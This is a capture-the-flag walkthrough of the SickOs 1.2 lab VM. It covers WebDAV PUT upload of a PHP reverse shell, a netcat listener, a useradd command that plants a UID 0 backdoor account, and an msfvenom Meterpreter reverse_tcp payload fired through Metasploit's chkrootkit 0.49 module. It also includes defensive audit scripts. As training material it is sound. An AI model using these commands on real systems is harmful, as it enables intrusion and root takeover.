In this walkthrough I explain how to solve the SickOs 1.2 challenge. The instructions say to get the highest privileges possible, i.e. get root. The download instructions say that you need to use VMware to run this VM. I say fooey to that. Since I’m already a fond user of VirtualBox I fully intended to use it for this challenge. To do so, download the image zip file and extract the .vmdk. To run it in VirtualBox, create a new VM, set the OS type to Linux and the version to Ubuntu (64-bit), and select "Do not add a virtual hard disk".

[Image: VB-SickOS]

Open the new SickOS vm settings and go to Storage settings.

Click the icon to add a new hard disk to the existing controller.

Select "Choose existing disk", then select SickOs1.2-disk1.vmdk.

Now the VM is ready to boot.

The Challenge

In order to find the IP address of the target I use netdiscover:

netdiscover -r 10.0.2.0/24

Now that the IP address is identified it’s time to profile the target.

root@Oak:~/Downloads/sickos# nmap -A -p- 10.0.2.29 
 
Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-30 11:09 EDT 
Nmap scan report for 10.0.2.29 
Host is up (0.00051s latency). 
Not shown: 65533 filtered ports 
PORT STATE SERVICE VERSION 
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey: 
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA) 
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA) 
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA) 
80/tcp open http lighttpd 1.4.28 
|_http-server-header: lighttpd/1.4.28 
|_http-title: Site doesn't have a title (text/html). 
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC) 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 
Device type: general purpose 
Running: Linux 3.X|4.X 
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 
OS details: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4 
Network Distance: 1 hop 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
 
TRACEROUTE 
HOP RTT ADDRESS 
1 0.51 ms 10.0.2.29 
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 114.27 seconds

Ok, ports 22 and 80 are open. I start by examining port 80 and I’m met with a Keanu conspiracy meme image.

[Image: blow]

I wasted a lot of time looking at this image for hidden treasures. I used tools such as foremost to see if any other files were combined with the image, and I used exiftool, to no avail. I then tried steghide to extract hidden messages. I even used Gimp and tried to adjust the color histogram to see if a message was hidden in the negative color.

Nothing… hmm, at this point I moved on from the image. I looked back at the source code of the webpage and noticed there was a message at the bottom.

<!-- NOTHING IN HERE ///\\\ -->>>>

I thought the extra > symbols had some meaning, but I came up with no explanation.

I decided to continue probing the HTTP service to see if I could find a way in.

I ran the http-enum nmap script and found a hidden directory.

root@Oak:~# nmap -p80 -sV --script http-enum --script-args http-enum.displayall 10.0.2.29

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:09 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.28
| http-enum: 
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds

The /test directory was empty, so no help there.

I wanted to see what methods are enabled on the http service so I ran the nmap http-methods script.

root@Oak:~# nmap --script http-methods --script-args http.test-all 10.0.2.29
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:45 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds

Hmm, next I decided to query the OPTIONS method to see if anything else stuck out as interesting.

Nothing looked interesting at the webroot, so I then checked the hidden test directory in the hope that it was a WebDAV directory.

root@Oak:~# curl -i -X OPTIONS 10.0.2.29/test
HTTP/1.1 301 Moved Permanently
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Location: http://10.0.2.29/test/
Content-Length: 0
Date: Sun, 01 May 2016 21:26:27 GMT
Server: lighttpd/1.4.28

The PUT option looks interesting.
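The OPTIONS reply above is what a defender should be checking for too: a DAV header plus PUT, DELETE, MKCOL or MOVE in Allow means an unauthenticated client can write into that directory. The following is an added example for this write-up, not code from the original post or from lighttpd; it parses a raw OPTIONS response and flags write-capable WebDAV methods. The sample response is constructed from the headers shown above, and the function names are my own.

```python
"""Flag write-capable WebDAV methods advertised by an HTTP OPTIONS response.

Added example for this write-up (not the post's own code). The sample
response is constructed from the curl output shown for /test.
"""
import http.client

# Methods that let a client create, change, move or delete resources.
# Read-only WebDAV (OPTIONS, GET, HEAD, PROPFIND) is deliberately not flagged.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample: the OPTIONS reply the target gave for /test.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 301 Moved Permanently",
    "DAV: 1,2",
    "MS-Author-Via: DAV",
    "Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK",
    "Location: http://10.0.2.29/test/",
    "Content-Length: 0",
    "Date: Sun, 01 May 2016 21:26:27 GMT",
    "Server: lighttpd/1.4.28",
    "",
    "",
])


def parse_response(raw):
    """Split a raw HTTP response into (status_line, {header: value}).

    Header names are lower-cased; the first blank line ends the header block.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def allowed_methods(headers):
    """Return the set of methods advertised in the Allow header (upper-cased)."""
    allow = headers.get("allow", "")
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def audit_options(raw, path):
    """Return a list of human-readable findings for one OPTIONS response."""
    _status, headers = parse_response(raw)
    findings = []
    if "dav" in headers:
        findings.append(f"{path}: WebDAV is enabled (DAV: {headers['dav']})")
    writable = allowed_methods(headers) & WRITE_METHODS
    if writable:
        findings.append(f"{path}: write methods allowed: {', '.join(sorted(writable))}")
    if "PUT" in writable:
        findings.append(f"{path}: PUT is allowed, so unauthenticated uploads are possible")
    return findings


def fetch_options(host, path, port=80, timeout=5):
    """Send OPTIONS to a server you administer and return the raw response text.

    Uses only http.client from the standard library; the reply is rebuilt as
    text so it can be fed to audit_options() like the constructed sample.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    status = f"HTTP/1.1 {resp.status} {resp.reason}"
    header_lines = [f"{k}: {v}" for k, v in resp.getheaders()]
    conn.close()
    return "\r\n".join([status, *header_lines, "", ""])


if __name__ == "__main__":
    for finding in audit_options(SAMPLE_RESPONSE, "/test"):
        print(finding)
```

Running the sample reports WebDAV enabled and eight write methods, PUT among them. On lighttpd the fix is either to drop mod_webdav from the directory or to set `webdav.is-readonly = "enable"` for it, which leaves PROPFIND available while refusing PUT and the other write methods.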

I used the nmap http-put script and was able to upload a PHP reverse shell from Pentestmonkey.

root@Oak:~# nmap -p80 10.0.2.29 --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:32 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00023s latency).
PORT STATE SERVICE
80/tcp open http
|_http-put: /test/sicpwn.php was successfully created
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

Now to fire up a netcat listener to catch the connection.

nc -nlvp 443

I triggered the PHP reverse shell using curl.

curl http://10.0.2.29/test/sicpwn.php
root@Oak:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.27] from (UNKNOWN) [10.0.2.29] 53091
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 14:56:24 up 36 min, 0 users, load average: 0.02, 0.07, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

At this point I have a low-privilege shell. Now it’s time to escalate.

After a bit of looking around I noticed a daily cron job that runs chkrootkit. This stood out as something to look into.

ls -la /etc/cron* 
... 
/etc/cron.daily: 
... 
-rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit

I did a google search for chkrootkit exploit and found the EDB entry for a chkrootkit 0.49 – Local Root Vulnerability.

I needed to know if the version running on the target is vulnerable.

$ head /usr/sbin/chkrootkit
#! /bin/sh
# -*- Shell-script -*-

# $Id: chkrootkit, v 0.49 2009/07/30
CHKROOTKIT_VERSION='0.49'

# Authors: Nelson Murilo <nelson@pangeia.com.br> (main author) and
# Klaus Steding-Jessen <jessen@cert.br>
#
# (c)1997-2009 Nelson Murilo, Pangeia Informatica, AMS Foundation and others.

Cool, it looks like this might be the way to get root. The only problem is that the cron job only runs once a day at 6:25.

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$

I created a file called update in /tmp and included a script to add a root user called kaizen.

echo useradd -ou 0 -g 0 kaizen > /tmp/update
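The three things the write-up has found so far (a chkrootkit 0.49 script that cron.daily runs as root, a crontab entry that schedules it, and a /tmp/update file that would be executed on that run) are exactly what a host audit should look for, along with the extra UID 0 account the planted script would create. The following is an added example for this write-up, not code from the original post, from chkrootkit or from Metasploit. It takes the script header, the crontab and /etc/passwd as text so it runs offline against constructed samples copied from the output above; the function names and the hypothetical tmp_listing parameter are my own.

```python
"""Audit checks for the chkrootkit 0.49 local-root issue used in this write-up.

Added example (not the post's own code). Inputs are passed in as text so the
checks run offline; the samples below are constructed from the write-up.
"""
import re

# Constructed sample: the head of /usr/sbin/chkrootkit as shown on the target.
CHKROOTKIT_HEADER = """#! /bin/sh
# -*- Shell-script -*-

# $Id: chkrootkit, v 0.49 2009/07/30
CHKROOTKIT_VERSION='0.49'
"""

# Constructed sample: the relevant lines of /etc/crontab from the target.
CRONTAB = """SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
"""

# Constructed sample: /etc/passwd after `useradd -ou 0 -g 0 kaizen` has run.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
kaizen:x:0:0::/home/kaizen:/bin/sh
"""


def chkrootkit_version(script_text):
    """Extract the CHKROOTKIT_VERSION value from the script, or None."""
    m = re.search(r"^CHKROOTKIT_VERSION='([^']+)'", script_text, re.M)
    return m.group(1) if m else None


def version_tuple(version):
    """'0.49' -> (0, 49); non-numeric suffixes are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def chkrootkit_is_affected(script_text):
    """True for 0.49 and earlier, the versions that execute /tmp/update as root
    (the EDB entry the write-up refers to)."""
    version = chkrootkit_version(script_text)
    return version is not None and version_tuple(version) <= (0, 49)


def cron_daily_schedule(crontab_text):
    """Return (minute, hour) of the run-parts line for /etc/cron.daily, or None."""
    for line in crontab_text.splitlines():
        if "/etc/cron.daily" in line and not line.lstrip().startswith("#"):
            fields = line.split()
            return int(fields[0]), int(fields[1])
    return None


def extra_uid0_accounts(passwd_text):
    """Names of accounts other than root whose UID is 0."""
    extras = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            extras.append(parts[0])
    return extras


def audit(script_text, crontab_text, passwd_text, tmp_listing):
    """Combine the checks. tmp_listing is the list of names in /tmp
    (e.g. os.listdir('/tmp') on a live host), passed in so this runs offline."""
    findings = []
    if chkrootkit_is_affected(script_text):
        findings.append(f"chkrootkit {chkrootkit_version(script_text)} executes /tmp/update as root")
        sched = cron_daily_schedule(crontab_text)
        if sched:
            findings.append(f"crontab runs cron.daily at {sched[1]:02d}:{sched[0]:02d}")
    if "update" in tmp_listing:
        findings.append("/tmp/update exists; inspect it before the next cron.daily run")
    for name in extra_uid0_accounts(passwd_text):
        findings.append(f"account {name} has UID 0")
    return findings


if __name__ == "__main__":
    for finding in audit(CHKROOTKIT_HEADER, CRONTAB, PASSWD, ["update"]):
        print(finding)
```

On a live host the same functions can be fed `open('/usr/sbin/chkrootkit').read()`, `open('/etc/crontab').read()`, `open('/etc/passwd').read()` and `os.listdir('/tmp')`. The remediation is to upgrade chkrootkit past 0.49; the UID 0 check is worth keeping regardless, since a second UID 0 account is the persistence artefact the planted /tmp/update would leave behind.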

The only problem was when 6:25 rolled around nothing happened. At this point I was annoyed.

Next I tried every Ubuntu exploit listed on EDB but none of them worked. I thought surely there had to be a better way than waiting until the next day to try the chkrootkit exploit.

Since nothing else I tried worked, and since I didn’t want to wait any more, I decided to fire up my old friend Metasploit.

Metasploit has an exploit for the chkrootkit vulnerability, but it requires a session, so I created a Meterpreter reverse shell with msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.27 LPORT=443 -f elf -o sh_rev_443

I used the nmap http-put script to upload the reverse shell.

Then I set up a Metasploit handler to listen.

use exploit/multi/handler
msf exploit(handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
 ---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
 ---- --------------- -------- -----------
 DebugOptions 0 no Debugging options for POSIX meterpreter
 LHOST 10.0.2.27 yes The listen address
 LPORT 443 yes The listen port
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.2.27:443 
msf exploit(handler) > [*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 10.0.2.29
[*] Meterpreter session 2 opened (10.0.2.27:443 -> 10.0.2.29:55936) at 2016-05-01 12:50:24 -0400

Now I needed to set up the chkrootkit exploit and payload.

msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > options

Module options (exploit/unix/local/chkrootkit):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
 SESSION yes The session to run this module on.


Exploit target:

Id Name
 -- ----
 0 Automatic

msf exploit(chkrootkit) > set lport 443
lport => 443
msf exploit(chkrootkit) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP double handler on 10.0.2.27:443 
msf exploit(chkrootkit) > [!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo TFiotsawCMKjHBKc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "TFiotsawCMKjHBKc\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (10.0.2.27:443 -> 10.0.2.29:55938) at 2016-05-01 12:52:35 -0400
[+] Deleted /tmp/update

I thought I was going to be waiting for a while, but the exploit was triggered immediately.

msf exploit(chkrootkit) > sessions -i 3
[*] Starting interaction with 3...

1606353480
oAlQqrGWXPVvhovERhaAQpsLuefqCBaT
true
bniDukHTDahxHIpUOlhgYSUxodJwqfwV
GJIQAOHHmgrfXvfvadGjTMXPKbgplxyL
PtpPWWwukudKtkYtVpeGFVNptgHBtXwF
id
uid=0(root) gid=0(root) groups=0(root)
ls /root
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule

Excellent! I have root!!

And now for the flag:

cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Summary:

Thanks to @D4rk36 and @Vulnhub for the challenge. It was a fun way to spend a rainy weekend.
